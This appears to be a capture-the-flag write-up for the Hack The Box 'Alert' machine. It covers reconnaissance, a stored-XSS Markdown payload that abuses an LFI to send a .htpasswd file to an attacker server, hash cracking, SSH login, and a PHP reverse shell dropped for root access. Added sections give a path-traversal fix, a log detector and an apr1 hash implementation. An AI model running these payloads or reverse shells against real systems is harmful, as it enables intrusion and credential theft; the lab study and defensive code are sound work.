# Alert

<figure><img src="https://pbs.twimg.com/media/Gc7AkEGWoAMAlJo.jpg" alt=""><figcaption><p>Machine</p></figcaption></figure>

{% embed url="https://www.hackthebox.com/machines/alert" %}
Link
{% endembed %}

## Reconnaissance

### Nmap Scanning Process

{% hint style="info" %}
Nmap, a network discovery tool, involves several steps:

1. **Host Discovery**: Identify live hosts using ICMP, TCP, or UDP packets.
2. **Port Scanning**: Scan for open ports on discovered hosts.
3. **Service Detection**: Determine running services and versions on open ports.
4. **OS Detection**: Detect the operating system of remote hosts.
5. **Script Scanning**: Use Nmap scripts for tasks like vulnerability detection.
6. **Output Options**: Save results in various formats for analysis or reporting.
{% endhint %}

These steps aid in mapping network topology and assessing security. The screenshot shows that the machine has two open ports: <mark style="color:red;">**80 & 22**</mark>.

<figure><img src="/files/dbUBxmNCtRrchlj6Mym2" alt="" width="375"><figcaption><p>Result of Nmap</p></figcaption></figure>

* **Port 80**: This port is commonly used for HTTP (Hypertext Transfer Protocol) traffic, which forms the foundation of the web. It is the default port for web servers to accept requests from web browsers over an unencrypted connection.
* **Port 22**: Known as the default port for SSH (Secure Shell), it allows secure management and data transfer over unsecured networks. SSH is commonly used for remote server management and secure file transfers.

### Subdomain Discovery Using the Fuzzing Method

{% hint style="info" %}
The fuzzing method involves sending a series of test inputs to identify valid subdomains for a given domain. The `ffuf` (Fuzz Faster U Fool) tool can be used to automate this process by:

1. **Command Structure**: The basic command format includes the target domain, header options, and wordlist.
2. **URL and Header**: Specify the URL you are targeting and use the `-H` option to set a header with a placeholder (FUZZ) for potential subdomains.
3. **Wordlist**: Utilize a wordlist containing common subdomain names to systematically test each entry. The `-w` option specifies the path to this list.
4. **Status Code Filtering**: Use `-fc` to filter out certain HTTP status codes (e.g., 301) to focus on potential subdomains that yield different responses.

This fuzz testing uncovers hidden or unlisted subdomains by systematically trying every entry in the provided wordlist.
{% endhint %}

```bash
ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 301
```

<figure><img src="/files/egXEkxK7B5T0qhOOzjq1" alt="" width="375"><figcaption><p>Finding sub-domain by Fuzzing</p></figcaption></figure>

<mark style="color:red;">**http://statistics.alert.htb**</mark> **-> Asked for a username and password**

<mark style="color:green;">**http://alert.htb**</mark> **-> Output below**

<figure><img src="/files/jT98oV4YZAUKGWB89wCH" alt="" width="375"><figcaption><p>Web</p></figcaption></figure>

## Identifying Bugs

Through analysis, it is clear that the page accepts a Markdown (`.md`) file as input and renders it. After doing some tests in Burp Suite, I suspected [XSS](https://owasp.org/www-community/attacks/xss/) and decided to test it.

{% hint style="info" %}
**Burp Suite** is a powerful web vulnerability scanner and testing framework used primarily for assessing the security of web applications.
{% endhint %}

## Exploitation

Our payload will look like this :clap:

**Hosting a Malicious Server**

```bash
python3 -m http.server 8888
```

**Malicious Markdown File (MD File)**

```html
<script>
fetch("http://alert.htb/messages.php?file=filepath")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:8888/?file_content=" + encodeURIComponent(data));
  });
</script>
<!-- xx.xx => replace with your local IP; filepath => the file you want messages.php to read -->
```

When this file was uploaded and opened, the script used the application's LFI in `messages.php` to read private files and send their contents to my Python server. I then received the contents of the file named in the vulnerable '*<mark style="color:red;">**filepath**</mark>*' parameter.

To get the user's password, I used the same LFI to read the [.htpasswd](https://www.nexcess.net/help/apache-htpasswd-file/#:~:text=htpasswd%20file%2C%20a%20flat%2Dfile,information%2C%20visit%20apache.org.) file of the statistics subdomain, which was the one asking for a username and password.

{% hint style="info" %}
**A `.htpasswd` file is a flat file used to store usernames and passwords for basic authentication on an Apache HTTP Server.**
{% endhint %}

```html
<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
  });
</script>
```

<figure><img src="/files/EZoKqSGCwXoAlfmNueR1" alt=""><figcaption><p>Uploading the payload</p></figcaption></figure>

* [x] After uploading it, go to **Share Markdown** and copy the generated link: `http://alert.htb/visualizer.php?link_share=...`
* [x] Go back to the Contact Us page, fill out any email address, and paste the link in the message box.

<figure><img src="/files/DCGYF9G3hwuz1egeiDaA" alt=""><figcaption><p>Triggering the exploit</p></figcaption></figure>
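The root cause of the chain above is `messages.php` reading whatever path arrives in `?file=`. As an added example that is not part of the original writeup or the target application (written in Python rather than the app's PHP so it runs stand-alone), here is a hardened resolver that confines the lookup to one directory, plus a detector run over constructed Apache-style access-log lines; the directory `/var/www/alert.htb/messages`, the log lines and the client addresses are assumptions.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

MESSAGES_DIR = "/var/www/alert.htb/messages"   # assumed location, not stated on the page
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
SENSITIVE = re.compile(r"\.htpasswd|/etc/(passwd|shadow)|\.ssh/")

def resolve_message_path(base_dir, requested):
    """Hardened lookup: resolve the user-supplied name against base_dir and
    accept it only if the normalised result is still inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, unquote(requested)))
    if os.path.commonpath([base, target]) != base:
        return None                       # '../' escape or absolute path: reject
    return target

def flag_lfi_attempts(log_lines):
    """Return (decoded file value, log line) for every messages.php request whose
    `file` parameter uses '..' segments, an absolute path or a sensitive name."""
    hits = []
    for line in log_lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/messages.php"):
            continue
        for raw in parse_qs(url.query).get("file", []):
            value = unquote(raw)          # parse_qs decoded once; catch double-encoding
            if value.startswith("/") or TRAVERSAL.search(value) or SENSITIVE.search(value):
                hits.append((value, line))
    return hits

# Constructed sample log lines (not from the page). The second mirrors the request the
# stored-XSS payload makes from the victim's browser once the shared link is opened.
SAMPLE_LOG = [
    '10.10.14.5 - - [14/Nov/2024:10:01:02 +0000] "GET /messages.php?file=2024-11-14.txt HTTP/1.1" 200 512',
    '127.0.0.1 - - [14/Nov/2024:10:01:09 +0000] "GET /messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd HTTP/1.1" 200 83',
    '10.10.14.5 - - [14/Nov/2024:10:01:15 +0000] "GET /messages.php?file=%252e%252e%252fconfig.php HTTP/1.1" 200 90',
    '10.10.14.5 - - [14/Nov/2024:10:01:20 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for value, line in flag_lfi_attempts(SAMPLE_LOG):
        print("LFI attempt:", value)
```

The same `commonpath` check in the resolver is what stops the `../../../../../../../var/www/...` request from ever leaving the messages directory, whether the traversal is plain or double-encoded.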

## User Flag

<figure><img src="/files/3HkioiooQjTVyxG21yeX" alt=""><figcaption><p>Output</p></figcaption></figure>

So, the <mark style="color:red;">password hash</mark> of the user will be:

```
%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A
```

Paste it into CyberChef and decode it with the URL Decode recipe: [Result](https://gchq.github.io/CyberChef/#recipe=URL_Decode\(\)\&input=JTNDcHJlJTNFYWxiZXJ0JTNBJTI0YXByMSUyNGJNb1JCSk9nJTI0aWdHOFdCdFExeFlEVFFkTGpTV1pRJTJGJTBBJTNDJTJGcHJlJTNFJTBB)

```
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
username -> albert
encrypted password as a hash -> $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
```

***

In order to <mark style="color:green;">crack</mark> the password, we need to identify the hash type. Here, I used the [Hashcat cheatsheet](https://hashcat.net/wiki/doku.php?id=example_hashes) and found it.

| Mode | Hash name                             |
| ---- | ------------------------------------- |
| 1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) |

{% hint style="info" %}
Hashcat is a powerful password recovery tool that supports many hashing algorithms and attack modes. It is known for its speed, versatility, and GPU acceleration, making it ideal for security testing and forensics.
{% endhint %}

```bash
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```

***

Since Hashcat requires quite a large amount of memory, you can use [John the Ripper](https://www.openwall.com/john/) instead.

***

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash.txt
```
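Added example, not from the original writeup: it URL-decodes the text the listener received into the `albert` entry, then implements the `$apr1$` scheme itself (Apache's MD5 variant of md5crypt, the one hashcat mode 1600 and john's `md5crypt-long` target), so a candidate password can be verified against the stored hash exactly as Apache does at login. The blob and hash are the page's values; the candidate passwords are constructed.

```python
import hashlib, hmac, re
from urllib.parse import unquote

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# The URL-encoded text the writeup's listener received (value taken from the page).
EXFIL_BLOB = "%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A"

def parse_htpasswd_blob(blob):
    """URL-decode the blob, drop the <pre> wrapper, return (user, hash)."""
    text = re.sub(r"</?pre>", "", unquote(blob)).strip()
    user, _, digest = text.splitlines()[0].partition(":")
    return user, digest

def _to64(value, count):
    out = ""                                   # md5crypt's own little-endian base64
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out

def apr1_crypt(password, salt):
    """Apache's $apr1$ md5crypt: a seeded MD5 followed by 1000 MD5 rounds."""
    pw, s = password.encode(), salt[:8].encode()
    ctx = hashlib.md5(pw + b"$apr1$" + s)
    alt = hashlib.md5(pw + s + pw).digest()
    for pl in range(len(pw), 0, -16):          # mix in len(pw) bytes of alt
        ctx.update(alt[:min(pl, 16)])
    i = len(pw)
    while i:                                   # the "something really weird" step
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                      # stretching loop (fast on a GPU, hence mode 1600)
        r = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            r.update(s)
        if i % 7:
            r.update(pw)
        r.update(final if i & 1 else pw)
        final = r.digest()
    triples = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in triples)
    return "$apr1$%s$%s" % (s.decode(), enc + _to64(final[11], 2))

def verify(digest, candidate):
    """What Apache does at login: recompute with the stored salt and compare."""
    if not digest.startswith("$apr1$"):
        raise ValueError("not an $apr1$ hash (other .htpasswd schemes need other code)")
    _, _, salt, _ = digest.split("$", 3)
    return hmac.compare_digest(apr1_crypt(candidate, salt), digest)
```

Because a single check is one seeded MD5 plus 1000 rounds, the scheme offers little resistance to wordlist attacks; bcrypt entries in `.htpasswd` are the usual remediation.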

<figure><img src="/files/0iLZ8QRK8HV7vh04mkvC" alt="" width="375"><figcaption><p>Password of user</p></figcaption></figure>

BOOM!!!

Log in as that user and read the user.txt file.

```bash
ssh albert@10.10.11.44
```

## Root Flag

<mark style="color:red;">**Privilege Escalation**</mark>

{% hint style="info" %}
**LinPEAS.sh** is a script designed to enumerate possible paths to escalate privileges on Linux systems. It automates the process of searching for potential vulnerabilities and misconfigurations that could be exploited to gain higher-level access, making it a useful tool for system administrators and security professionals in identifying and mitigating risks.
{% endhint %}

<figure><img src="https://www.hyhforever.top/wp-content/uploads/2024/11/image-138.png" alt=""><figcaption></figcaption></figure>

<mark style="color:blue;">**Open port: 8080**</mark>

```bash
ssh -L 8080:127.0.0.1:8080 albert@alert.htb
```

<mark style="color:red;">**Testing the open port locally using ssh**</mark>

<figure><img src="https://www.hyhforever.top/wp-content/uploads/2024/11/image-139-1024x615.png" alt=""><figcaption><p>Accessing Locally</p></figcaption></figure>

The most interesting part is that the application under /opt runs with root permissions, which gives us the opportunity to drop a shell there and execute it from the browser.

{% stepper %}
{% step %}

### Create shell.php file

```php
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.**.**/4444 0>&1'"); ?>
```

{% endstep %}

{% step %}

### Place the file in the /opt/website-monitor/config directory

<figure><img src="https://www.hyhforever.top/wp-content/uploads/2024/11/image-140.png" alt=""><figcaption></figcaption></figure>
{% endstep %}

{% step %}

### Start netcat listener

```bash
nc -lnvp 4444
```

{% endstep %}

{% step %}

### Trigger the shell through port 8080

```
http://127.0.0.1:8080/config/shell.php
```

{% endstep %}
{% endstepper %}

The End!!! :end:

Thank you!!! :pray:

{% embed url="https://www.hackthebox.com/achievement/machine/915327/636" %}

